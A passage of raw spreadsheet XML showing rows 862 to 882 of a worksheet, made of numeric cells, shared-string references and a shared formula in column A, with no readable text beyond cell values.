      <c r="N862" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O862" s="29">
        <v>3.0</v>
      </c>
      <c r="P862" s="29">
        <v>1.0</v>
      </c>
      <c r="Q862" s="15"/>
      <c r="R862" s="15"/>
      <c r="S862" s="15"/>
      <c r="T862" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U862" s="5"/>
      <c r="V862" s="5"/>
      <c r="W862" s="47"/>
      <c r="X862" s="45"/>
      <c r="Y862" s="45"/>
      <c r="Z862" s="38" t="s">
        <v>3551</v>
      </c>
      <c r="AA862" s="39" t="s">
        <v>3552</v>
      </c>
      <c r="AB862" s="38" t="s">
        <v>3553</v>
      </c>
      <c r="AC862" s="40">
        <v>98239.0</v>
      </c>
      <c r="AD862" s="5"/>
      <c r="AE862" s="14"/>
      <c r="AF862" s="14"/>
    </row>
    <row r="863">
      <c r="A863" s="6">
        <f t="shared" si="1"/>
        <v>0.2303016536</v>
      </c>
      <c r="B863" s="29">
        <v>1.0</v>
      </c>
      <c r="C863" s="14"/>
      <c r="D863" s="14"/>
      <c r="E863" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F863" s="14"/>
      <c r="G863" s="29">
        <v>-1.0</v>
      </c>
      <c r="H863" s="29">
        <v>91.0</v>
      </c>
      <c r="I863" s="29">
        <v>192349.0</v>
      </c>
      <c r="J863" s="15"/>
      <c r="K863" s="29">
        <v>6253.0</v>
      </c>
      <c r="L863" s="15"/>
      <c r="M863" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N863" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O863" s="29">
        <v>1.0</v>
      </c>
      <c r="P863" s="29">
        <v>2.0</v>
      </c>
      <c r="Q863" s="15"/>
      <c r="R863" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S863" s="15"/>
      <c r="T863" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U863" s="5"/>
      <c r="V863" s="5"/>
      <c r="W863" s="47"/>
      <c r="X863" s="45"/>
      <c r="Y863" s="45"/>
      <c r="Z863" s="38" t="s">
        <v>3554</v>
      </c>
      <c r="AA863" s="39" t="s">
        <v>3555</v>
      </c>
      <c r="AB863" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC863" s="40">
        <v>198594.0</v>
      </c>
      <c r="AD863" s="5"/>
      <c r="AE863" s="14"/>
      <c r="AF863" s="14"/>
    </row>
    <row r="864">
      <c r="A864" s="6">
        <f t="shared" si="1"/>
        <v>0.3501206711</v>
      </c>
      <c r="B864" s="29">
        <v>1.0</v>
      </c>
      <c r="C864" s="14"/>
      <c r="D864" s="14"/>
      <c r="E864" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F864" s="14"/>
      <c r="G864" s="29">
        <v>8.0</v>
      </c>
      <c r="H864" s="29">
        <v>309.0</v>
      </c>
      <c r="I864" s="29">
        <v>30807.0</v>
      </c>
      <c r="J864" s="15"/>
      <c r="K864" s="29">
        <v>30807.0</v>
      </c>
      <c r="L864" s="15"/>
      <c r="M864" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N864" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O864" s="29">
        <v>1.0</v>
      </c>
      <c r="P864" s="29">
        <v>1.0</v>
      </c>
      <c r="Q864" s="15"/>
      <c r="R864" s="15"/>
      <c r="S864" s="15"/>
      <c r="T864" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U864" s="5"/>
      <c r="V864" s="5"/>
      <c r="W864" s="47"/>
      <c r="X864" s="45"/>
      <c r="Y864" s="45"/>
      <c r="Z864" s="38" t="s">
        <v>3556</v>
      </c>
      <c r="AA864" s="39" t="s">
        <v>3557</v>
      </c>
      <c r="AB864" s="38" t="s">
        <v>3558</v>
      </c>
      <c r="AC864" s="40">
        <v>42417.0</v>
      </c>
      <c r="AD864" s="5"/>
      <c r="AE864" s="14"/>
      <c r="AF864" s="14"/>
    </row>
    <row r="865">
      <c r="A865" s="6">
        <f t="shared" si="1"/>
        <v>0.5706317618</v>
      </c>
      <c r="B865" s="29">
        <v>1.0</v>
      </c>
      <c r="C865" s="29">
        <v>14977.0</v>
      </c>
      <c r="D865" s="14"/>
      <c r="E865" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F865" s="14"/>
      <c r="G865" s="29">
        <v>82.0</v>
      </c>
      <c r="H865" s="29">
        <v>19911.0</v>
      </c>
      <c r="I865" s="29">
        <v>9734.0</v>
      </c>
      <c r="J865" s="15"/>
      <c r="K865" s="29">
        <v>-1.0</v>
      </c>
      <c r="L865" s="15"/>
      <c r="M865" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N865" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O865" s="29">
        <v>8.0</v>
      </c>
      <c r="P865" s="29">
        <v>9.0</v>
      </c>
      <c r="Q865" s="15"/>
      <c r="R865" s="15"/>
      <c r="S865" s="15"/>
      <c r="T865" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U865" s="5"/>
      <c r="V865" s="5"/>
      <c r="W865" s="47"/>
      <c r="X865" s="45"/>
      <c r="Y865" s="45"/>
      <c r="Z865" s="38" t="s">
        <v>3559</v>
      </c>
      <c r="AA865" s="39" t="s">
        <v>3560</v>
      </c>
      <c r="AB865" s="38" t="s">
        <v>3561</v>
      </c>
      <c r="AC865" s="40">
        <v>14967.0</v>
      </c>
      <c r="AD865" s="5"/>
      <c r="AE865" s="14"/>
      <c r="AF865" s="14"/>
    </row>
    <row r="866">
      <c r="A866" s="6">
        <f t="shared" si="1"/>
        <v>0.9620142049</v>
      </c>
      <c r="B866" s="29">
        <v>1.0</v>
      </c>
      <c r="C866" s="29">
        <v>133958.0</v>
      </c>
      <c r="D866" s="14"/>
      <c r="E866" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F866" s="14"/>
      <c r="G866" s="29">
        <v>2.0</v>
      </c>
      <c r="H866" s="29">
        <v>198.0</v>
      </c>
      <c r="I866" s="29">
        <v>94428.0</v>
      </c>
      <c r="J866" s="15"/>
      <c r="K866" s="15"/>
      <c r="L866" s="15"/>
      <c r="M866" s="15"/>
      <c r="N866" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O866" s="29">
        <v>1.0</v>
      </c>
      <c r="P866" s="29">
        <v>1.0</v>
      </c>
      <c r="Q866" s="15"/>
      <c r="R866" s="15"/>
      <c r="S866" s="15"/>
      <c r="T866" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U866" s="5"/>
      <c r="V866" s="5"/>
      <c r="W866" s="47"/>
      <c r="X866" s="45"/>
      <c r="Y866" s="45"/>
      <c r="Z866" s="38" t="s">
        <v>3562</v>
      </c>
      <c r="AA866" s="39" t="s">
        <v>3563</v>
      </c>
      <c r="AB866" s="38" t="s">
        <v>3564</v>
      </c>
      <c r="AC866" s="40">
        <v>112463.0</v>
      </c>
      <c r="AD866" s="5"/>
      <c r="AE866" s="14"/>
      <c r="AF866" s="14"/>
    </row>
    <row r="867">
      <c r="A867" s="6">
        <f t="shared" si="1"/>
        <v>0.5047760798</v>
      </c>
      <c r="B867" s="29">
        <v>1.0</v>
      </c>
      <c r="C867" s="14"/>
      <c r="D867" s="14"/>
      <c r="E867" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F867" s="14"/>
      <c r="G867" s="29">
        <v>1.0</v>
      </c>
      <c r="H867" s="29">
        <v>248.0</v>
      </c>
      <c r="I867" s="29">
        <v>16316.0</v>
      </c>
      <c r="J867" s="15"/>
      <c r="K867" s="15"/>
      <c r="L867" s="15"/>
      <c r="M867" s="15"/>
      <c r="N867" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O867" s="29">
        <v>4.0</v>
      </c>
      <c r="P867" s="29">
        <v>0.0</v>
      </c>
      <c r="Q867" s="15"/>
      <c r="R867" s="15"/>
      <c r="S867" s="15"/>
      <c r="T867" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U867" s="5"/>
      <c r="V867" s="5"/>
      <c r="W867" s="47"/>
      <c r="X867" s="45"/>
      <c r="Y867" s="45"/>
      <c r="Z867" s="38" t="s">
        <v>3565</v>
      </c>
      <c r="AA867" s="39" t="s">
        <v>3566</v>
      </c>
      <c r="AB867" s="38" t="s">
        <v>2485</v>
      </c>
      <c r="AC867" s="40">
        <v>62372.0</v>
      </c>
      <c r="AD867" s="5"/>
      <c r="AE867" s="14"/>
      <c r="AF867" s="14"/>
    </row>
    <row r="868">
      <c r="A868" s="6">
        <f t="shared" si="1"/>
        <v>0.4339612788</v>
      </c>
      <c r="B868" s="29">
        <v>1.0</v>
      </c>
      <c r="C868" s="29">
        <v>41318.0</v>
      </c>
      <c r="D868" s="14"/>
      <c r="E868" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F868" s="14"/>
      <c r="G868" s="29">
        <v>18.0</v>
      </c>
      <c r="H868" s="29">
        <v>16710.0</v>
      </c>
      <c r="I868" s="29">
        <v>30031.0</v>
      </c>
      <c r="J868" s="15"/>
      <c r="K868" s="29">
        <v>86652.0</v>
      </c>
      <c r="L868" s="15"/>
      <c r="M868" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N868" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O868" s="29">
        <v>3.0</v>
      </c>
      <c r="P868" s="29">
        <v>0.0</v>
      </c>
      <c r="Q868" s="15"/>
      <c r="R868" s="15"/>
      <c r="S868" s="15"/>
      <c r="T868" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U868" s="5"/>
      <c r="V868" s="5"/>
      <c r="W868" s="47"/>
      <c r="X868" s="45"/>
      <c r="Y868" s="45"/>
      <c r="Z868" s="38" t="s">
        <v>3567</v>
      </c>
      <c r="AA868" s="39" t="s">
        <v>3568</v>
      </c>
      <c r="AB868" s="38" t="s">
        <v>3569</v>
      </c>
      <c r="AC868" s="40">
        <v>41289.0</v>
      </c>
      <c r="AD868" s="5"/>
      <c r="AE868" s="14"/>
      <c r="AF868" s="14"/>
    </row>
    <row r="869">
      <c r="A869" s="6">
        <f t="shared" si="1"/>
        <v>0.4016510962</v>
      </c>
      <c r="B869" s="29">
        <v>1.0</v>
      </c>
      <c r="C869" s="29">
        <v>104837.0</v>
      </c>
      <c r="D869" s="14"/>
      <c r="E869" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F869" s="14"/>
      <c r="G869" s="29">
        <v>2.0</v>
      </c>
      <c r="H869" s="29">
        <v>314.0</v>
      </c>
      <c r="I869" s="29">
        <v>58623.0</v>
      </c>
      <c r="J869" s="15"/>
      <c r="K869" s="29">
        <v>58623.0</v>
      </c>
      <c r="L869" s="15"/>
      <c r="M869" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N869" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O869" s="29">
        <v>3.0</v>
      </c>
      <c r="P869" s="29">
        <v>0.0</v>
      </c>
      <c r="Q869" s="15"/>
      <c r="R869" s="15"/>
      <c r="S869" s="15"/>
      <c r="T869" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U869" s="5"/>
      <c r="V869" s="5"/>
      <c r="W869" s="47"/>
      <c r="X869" s="45"/>
      <c r="Y869" s="45"/>
      <c r="Z869" s="38" t="s">
        <v>3570</v>
      </c>
      <c r="AA869" s="39" t="s">
        <v>3571</v>
      </c>
      <c r="AB869" s="38" t="s">
        <v>3572</v>
      </c>
      <c r="AC869" s="40">
        <v>104836.0</v>
      </c>
      <c r="AD869" s="5"/>
      <c r="AE869" s="14"/>
      <c r="AF869" s="14"/>
    </row>
    <row r="870">
      <c r="A870" s="6">
        <f t="shared" si="1"/>
        <v>0.4939288875</v>
      </c>
      <c r="B870" s="29">
        <v>1.0</v>
      </c>
      <c r="C870" s="29">
        <v>266539.0</v>
      </c>
      <c r="D870" s="14"/>
      <c r="E870" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F870" s="14"/>
      <c r="G870" s="29">
        <v>1.0</v>
      </c>
      <c r="H870" s="29">
        <v>73.0</v>
      </c>
      <c r="I870" s="29">
        <v>68225.0</v>
      </c>
      <c r="J870" s="15"/>
      <c r="K870" s="15"/>
      <c r="L870" s="15"/>
      <c r="M870" s="14"/>
      <c r="N870" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O870" s="29">
        <v>1.0</v>
      </c>
      <c r="P870" s="29">
        <v>0.0</v>
      </c>
      <c r="Q870" s="15"/>
      <c r="R870" s="15"/>
      <c r="S870" s="15"/>
      <c r="T870" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U870" s="5"/>
      <c r="V870" s="5"/>
      <c r="W870" s="47"/>
      <c r="X870" s="45"/>
      <c r="Y870" s="45"/>
      <c r="Z870" s="38" t="s">
        <v>3573</v>
      </c>
      <c r="AA870" s="39" t="s">
        <v>3574</v>
      </c>
      <c r="AB870" s="38" t="s">
        <v>3575</v>
      </c>
      <c r="AC870" s="40">
        <v>266536.0</v>
      </c>
      <c r="AD870" s="5"/>
      <c r="AE870" s="14"/>
      <c r="AF870" s="14"/>
    </row>
    <row r="871">
      <c r="A871" s="6">
        <f t="shared" si="1"/>
        <v>0.5497032178</v>
      </c>
      <c r="B871" s="29">
        <v>1.0</v>
      </c>
      <c r="C871" s="29">
        <v>143433.0</v>
      </c>
      <c r="D871" s="14"/>
      <c r="E871" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F871" s="14"/>
      <c r="G871" s="29">
        <v>7.0</v>
      </c>
      <c r="H871" s="29">
        <v>632.0</v>
      </c>
      <c r="I871" s="29">
        <v>131381.0</v>
      </c>
      <c r="J871" s="15"/>
      <c r="K871" s="15"/>
      <c r="L871" s="15"/>
      <c r="M871" s="15"/>
      <c r="N871" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O871" s="29">
        <v>1.0</v>
      </c>
      <c r="P871" s="29">
        <v>10.0</v>
      </c>
      <c r="Q871" s="15"/>
      <c r="R871" s="15"/>
      <c r="S871" s="15"/>
      <c r="T871" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U871" s="5"/>
      <c r="V871" s="5"/>
      <c r="W871" s="45"/>
      <c r="X871" s="45"/>
      <c r="Y871" s="45"/>
      <c r="Z871" s="38" t="s">
        <v>3576</v>
      </c>
      <c r="AA871" s="39" t="s">
        <v>3577</v>
      </c>
      <c r="AB871" s="38" t="s">
        <v>3578</v>
      </c>
      <c r="AC871" s="40">
        <v>143408.0</v>
      </c>
      <c r="AD871" s="5"/>
      <c r="AE871" s="14"/>
      <c r="AF871" s="14"/>
    </row>
    <row r="872">
      <c r="A872" s="6">
        <f t="shared" si="1"/>
        <v>0.2418609964</v>
      </c>
      <c r="B872" s="29">
        <v>1.0</v>
      </c>
      <c r="C872" s="29">
        <v>244408.0</v>
      </c>
      <c r="D872" s="14"/>
      <c r="E872" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F872" s="14"/>
      <c r="G872" s="29">
        <v>0.0</v>
      </c>
      <c r="H872" s="29">
        <v>176.0</v>
      </c>
      <c r="I872" s="29">
        <v>248320.0</v>
      </c>
      <c r="J872" s="15"/>
      <c r="K872" s="29">
        <v>248320.0</v>
      </c>
      <c r="L872" s="15"/>
      <c r="M872" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N872" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O872" s="29">
        <v>2.0</v>
      </c>
      <c r="P872" s="29">
        <v>0.0</v>
      </c>
      <c r="Q872" s="29">
        <v>0.0</v>
      </c>
      <c r="R872" s="15"/>
      <c r="S872" s="15"/>
      <c r="T872" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U872" s="5"/>
      <c r="V872" s="5"/>
      <c r="W872" s="47"/>
      <c r="X872" s="45"/>
      <c r="Y872" s="45"/>
      <c r="Z872" s="38" t="s">
        <v>3579</v>
      </c>
      <c r="AA872" s="39" t="s">
        <v>3580</v>
      </c>
      <c r="AB872" s="38" t="s">
        <v>3581</v>
      </c>
      <c r="AC872" s="40">
        <v>244404.0</v>
      </c>
      <c r="AD872" s="5"/>
      <c r="AE872" s="14"/>
      <c r="AF872" s="14"/>
    </row>
    <row r="873">
      <c r="A873" s="6">
        <f t="shared" si="1"/>
        <v>0.07495541433</v>
      </c>
      <c r="B873" s="29">
        <v>1.0</v>
      </c>
      <c r="C873" s="15"/>
      <c r="D873" s="14"/>
      <c r="E873" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F873" s="14"/>
      <c r="G873" s="29">
        <v>1.0</v>
      </c>
      <c r="H873" s="29">
        <v>88.0</v>
      </c>
      <c r="I873" s="29">
        <v>177146.0</v>
      </c>
      <c r="J873" s="15"/>
      <c r="K873" s="29">
        <v>6253.0</v>
      </c>
      <c r="L873" s="15"/>
      <c r="M873" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N873" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O873" s="29">
        <v>0.0</v>
      </c>
      <c r="P873" s="29">
        <v>4.0</v>
      </c>
      <c r="Q873" s="15"/>
      <c r="R873" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S873" s="15"/>
      <c r="T873" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U873" s="5"/>
      <c r="V873" s="5"/>
      <c r="W873" s="47"/>
      <c r="X873" s="45"/>
      <c r="Y873" s="45"/>
      <c r="Z873" s="38" t="s">
        <v>3582</v>
      </c>
      <c r="AA873" s="39" t="s">
        <v>3583</v>
      </c>
      <c r="AB873" s="38" t="s">
        <v>3584</v>
      </c>
      <c r="AC873" s="40">
        <v>191317.0</v>
      </c>
      <c r="AD873" s="5"/>
      <c r="AE873" s="14"/>
      <c r="AF873" s="14"/>
    </row>
    <row r="874">
      <c r="A874" s="6">
        <f t="shared" si="1"/>
        <v>0.8432639481</v>
      </c>
      <c r="B874" s="29">
        <v>1.0</v>
      </c>
      <c r="C874" s="15"/>
      <c r="D874" s="14"/>
      <c r="E874" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F874" s="14"/>
      <c r="G874" s="29">
        <v>3.0</v>
      </c>
      <c r="H874" s="29">
        <v>107.0</v>
      </c>
      <c r="I874" s="29">
        <v>286699.0</v>
      </c>
      <c r="J874" s="15"/>
      <c r="K874" s="29">
        <v>6253.0</v>
      </c>
      <c r="L874" s="15"/>
      <c r="M874" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N874" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O874" s="29">
        <v>1.0</v>
      </c>
      <c r="P874" s="29">
        <v>0.0</v>
      </c>
      <c r="Q874" s="15"/>
      <c r="R874" s="15"/>
      <c r="S874" s="15"/>
      <c r="T874" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U874" s="5"/>
      <c r="V874" s="5"/>
      <c r="W874" s="47"/>
      <c r="X874" s="45"/>
      <c r="Y874" s="45"/>
      <c r="Z874" s="38" t="s">
        <v>3585</v>
      </c>
      <c r="AA874" s="39" t="s">
        <v>3586</v>
      </c>
      <c r="AB874" s="38" t="s">
        <v>2234</v>
      </c>
      <c r="AC874" s="40">
        <v>267040.0</v>
      </c>
      <c r="AD874" s="5"/>
      <c r="AE874" s="14"/>
      <c r="AF874" s="14"/>
    </row>
    <row r="875">
      <c r="A875" s="6">
        <f t="shared" si="1"/>
        <v>0.8051333925</v>
      </c>
      <c r="B875" s="29">
        <v>1.0</v>
      </c>
      <c r="C875" s="15"/>
      <c r="D875" s="14"/>
      <c r="E875" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F875" s="14"/>
      <c r="G875" s="29">
        <v>0.0</v>
      </c>
      <c r="H875" s="29">
        <v>92.0</v>
      </c>
      <c r="I875" s="29">
        <v>116104.0</v>
      </c>
      <c r="J875" s="15"/>
      <c r="K875" s="15"/>
      <c r="L875" s="15"/>
      <c r="M875" s="15"/>
      <c r="N875" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O875" s="29">
        <v>0.0</v>
      </c>
      <c r="P875" s="29">
        <v>2.0</v>
      </c>
      <c r="Q875" s="15"/>
      <c r="R875" s="15"/>
      <c r="S875" s="15"/>
      <c r="T875" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U875" s="5"/>
      <c r="V875" s="5"/>
      <c r="W875" s="47"/>
      <c r="X875" s="45"/>
      <c r="Y875" s="45"/>
      <c r="Z875" s="38" t="s">
        <v>3587</v>
      </c>
      <c r="AA875" s="39" t="s">
        <v>3588</v>
      </c>
      <c r="AB875" s="38" t="s">
        <v>3589</v>
      </c>
      <c r="AC875" s="40">
        <v>248851.0</v>
      </c>
      <c r="AD875" s="5"/>
      <c r="AE875" s="14"/>
      <c r="AF875" s="14"/>
    </row>
    <row r="876">
      <c r="A876" s="6">
        <f t="shared" si="1"/>
        <v>0.6190647499</v>
      </c>
      <c r="B876" s="29">
        <v>1.0</v>
      </c>
      <c r="C876" s="29">
        <v>106825.0</v>
      </c>
      <c r="D876" s="14"/>
      <c r="E876" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F876" s="14"/>
      <c r="G876" s="29">
        <v>8.0</v>
      </c>
      <c r="H876" s="29">
        <v>4062.0</v>
      </c>
      <c r="I876" s="29">
        <v>2553.0</v>
      </c>
      <c r="J876" s="15"/>
      <c r="K876" s="29">
        <v>2553.0</v>
      </c>
      <c r="L876" s="15"/>
      <c r="M876" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N876" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O876" s="29">
        <v>2.0</v>
      </c>
      <c r="P876" s="29">
        <v>1.0</v>
      </c>
      <c r="Q876" s="15"/>
      <c r="R876" s="15"/>
      <c r="S876" s="15"/>
      <c r="T876" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U876" s="5"/>
      <c r="V876" s="5"/>
      <c r="W876" s="47"/>
      <c r="X876" s="45"/>
      <c r="Y876" s="45"/>
      <c r="Z876" s="38" t="s">
        <v>3590</v>
      </c>
      <c r="AA876" s="39" t="s">
        <v>3591</v>
      </c>
      <c r="AB876" s="38" t="s">
        <v>3592</v>
      </c>
      <c r="AC876" s="40">
        <v>106728.0</v>
      </c>
      <c r="AD876" s="5"/>
      <c r="AE876" s="14"/>
      <c r="AF876" s="14"/>
    </row>
    <row r="877">
      <c r="A877" s="6">
        <f t="shared" si="1"/>
        <v>0.0445363568</v>
      </c>
      <c r="B877" s="29">
        <v>1.0</v>
      </c>
      <c r="C877" s="14"/>
      <c r="D877" s="14"/>
      <c r="E877" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F877" s="14"/>
      <c r="G877" s="29">
        <v>7.0</v>
      </c>
      <c r="H877" s="29">
        <v>99931.0</v>
      </c>
      <c r="I877" s="29">
        <v>104795.0</v>
      </c>
      <c r="J877" s="15"/>
      <c r="K877" s="15"/>
      <c r="L877" s="15"/>
      <c r="M877" s="15"/>
      <c r="N877" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O877" s="29">
        <v>3.0</v>
      </c>
      <c r="P877" s="29">
        <v>4.0</v>
      </c>
      <c r="Q877" s="15"/>
      <c r="R877" s="15"/>
      <c r="S877" s="15"/>
      <c r="T877" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U877" s="5"/>
      <c r="V877" s="5"/>
      <c r="W877" s="47"/>
      <c r="X877" s="45"/>
      <c r="Y877" s="45"/>
      <c r="Z877" s="38" t="s">
        <v>3593</v>
      </c>
      <c r="AA877" s="39" t="s">
        <v>3594</v>
      </c>
      <c r="AB877" s="38" t="s">
        <v>3595</v>
      </c>
      <c r="AC877" s="40">
        <v>117789.0</v>
      </c>
      <c r="AD877" s="5"/>
      <c r="AE877" s="14"/>
      <c r="AF877" s="14"/>
    </row>
    <row r="878">
      <c r="A878" s="6">
        <f t="shared" si="1"/>
        <v>0.8631612204</v>
      </c>
      <c r="B878" s="29">
        <v>1.0</v>
      </c>
      <c r="C878" s="15"/>
      <c r="D878" s="14"/>
      <c r="E878" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F878" s="14"/>
      <c r="G878" s="29">
        <v>2.0</v>
      </c>
      <c r="H878" s="29">
        <v>425.0</v>
      </c>
      <c r="I878" s="29">
        <v>32378.0</v>
      </c>
      <c r="J878" s="15"/>
      <c r="K878" s="29">
        <v>32378.0</v>
      </c>
      <c r="L878" s="15"/>
      <c r="M878" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N878" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O878" s="29">
        <v>1.0</v>
      </c>
      <c r="P878" s="29">
        <v>1.0</v>
      </c>
      <c r="Q878" s="15"/>
      <c r="R878" s="15"/>
      <c r="S878" s="15"/>
      <c r="T878" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U878" s="5"/>
      <c r="V878" s="5"/>
      <c r="W878" s="47"/>
      <c r="X878" s="45"/>
      <c r="Y878" s="45"/>
      <c r="Z878" s="38" t="s">
        <v>3596</v>
      </c>
      <c r="AA878" s="39" t="s">
        <v>3597</v>
      </c>
      <c r="AB878" s="38" t="s">
        <v>3598</v>
      </c>
      <c r="AC878" s="40">
        <v>177396.0</v>
      </c>
      <c r="AD878" s="5"/>
      <c r="AE878" s="14"/>
      <c r="AF878" s="14"/>
    </row>
    <row r="879">
      <c r="A879" s="6">
        <f t="shared" si="1"/>
        <v>0.9918987164</v>
      </c>
      <c r="B879" s="29">
        <v>1.0</v>
      </c>
      <c r="C879" s="14"/>
      <c r="D879" s="14"/>
      <c r="E879" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F879" s="14"/>
      <c r="G879" s="29">
        <v>1.0</v>
      </c>
      <c r="H879" s="29">
        <v>49.0</v>
      </c>
      <c r="I879" s="29">
        <v>201928.0</v>
      </c>
      <c r="J879" s="15"/>
      <c r="K879" s="15"/>
      <c r="L879" s="15"/>
      <c r="M879" s="14"/>
      <c r="N879" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O879" s="29">
        <v>0.0</v>
      </c>
      <c r="P879" s="29">
        <v>0.0</v>
      </c>
      <c r="Q879" s="15"/>
      <c r="R879" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S879" s="15"/>
      <c r="T879" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U879" s="5"/>
      <c r="V879" s="5"/>
      <c r="W879" s="47"/>
      <c r="X879" s="45"/>
      <c r="Y879" s="45"/>
      <c r="Z879" s="38" t="s">
        <v>3599</v>
      </c>
      <c r="AA879" s="39" t="s">
        <v>3600</v>
      </c>
      <c r="AB879" s="38" t="s">
        <v>1296</v>
      </c>
      <c r="AC879" s="40">
        <v>269765.0</v>
      </c>
      <c r="AD879" s="5"/>
      <c r="AE879" s="14"/>
      <c r="AF879" s="14"/>
    </row>
    <row r="880">
      <c r="A880" s="6">
        <f t="shared" si="1"/>
        <v>0.324952816</v>
      </c>
      <c r="B880" s="29">
        <v>1.0</v>
      </c>
      <c r="C880" s="15"/>
      <c r="D880" s="14"/>
      <c r="E880" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F880" s="14"/>
      <c r="G880" s="29">
        <v>2.0</v>
      </c>
      <c r="H880" s="29">
        <v>172.0</v>
      </c>
      <c r="I880" s="29">
        <v>241317.0</v>
      </c>
      <c r="J880" s="15"/>
      <c r="K880" s="15"/>
      <c r="L880" s="15"/>
      <c r="M880" s="14"/>
      <c r="N880" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O880" s="29">
        <v>1.0</v>
      </c>
      <c r="P880" s="29">
        <v>2.0</v>
      </c>
      <c r="Q880" s="15"/>
      <c r="R880" s="15"/>
      <c r="S880" s="15"/>
      <c r="T880" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U880" s="5"/>
      <c r="V880" s="5"/>
      <c r="W880" s="47"/>
      <c r="X880" s="45"/>
      <c r="Y880" s="45"/>
      <c r="Z880" s="38" t="s">
        <v>3601</v>
      </c>
      <c r="AA880" s="39" t="s">
        <v>3602</v>
      </c>
      <c r="AB880" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC880" s="40">
        <v>237230.0</v>
      </c>
      <c r="AD880" s="5"/>
      <c r="AE880" s="14"/>
      <c r="AF880" s="14"/>
    </row>
    <row r="881">
      <c r="A881" s="6">
        <f t="shared" si="1"/>
        <v>0.1751561504</v>
      </c>
      <c r="B881" s="29">
        <v>1.0</v>
      </c>
      <c r="C881" s="15"/>
      <c r="D881" s="14"/>
      <c r="E881" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F881" s="14"/>
      <c r="G881" s="29">
        <v>4.0</v>
      </c>
      <c r="H881" s="29">
        <v>384.0</v>
      </c>
      <c r="I881" s="29">
        <v>16022.0</v>
      </c>
      <c r="J881" s="15"/>
      <c r="K881" s="29">
        <v>836.0</v>
      </c>
      <c r="L881" s="15"/>
      <c r="M881" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N881" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O881" s="29">
        <v>1.0</v>
      </c>
      <c r="P881" s="29">
        <v>4.0</v>
      </c>
      <c r="Q881" s="15"/>
      <c r="R881" s="15"/>
      <c r="S881" s="15"/>
      <c r="T881" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U881" s="5"/>
      <c r="V881" s="5"/>
      <c r="W881" s="47"/>
      <c r="X881" s="45"/>
      <c r="Y881" s="45"/>
      <c r="Z881" s="38" t="s">
        <v>3603</v>
      </c>
      <c r="AA881" s="39" t="s">
        <v>3604</v>
      </c>
      <c r="AB881" s="38" t="s">
        <v>3605</v>
      </c>
      <c r="AC881" s="40">
        <v>24007.0</v>
      </c>
      <c r="AD881" s="5"/>
      <c r="AE881" s="14"/>
      <c r="AF881" s="14"/>
    </row>
    <row r="882">
      <c r="A882" s="6">
        <f t="shared" si="1"/>
        <v>0.3351294006</v>
      </c>
      <c r="B882" s="29">
        <v>1.0</v>
      </c>
      <c r="C882" s="15"/>
      <c r="D882" s="14"/>
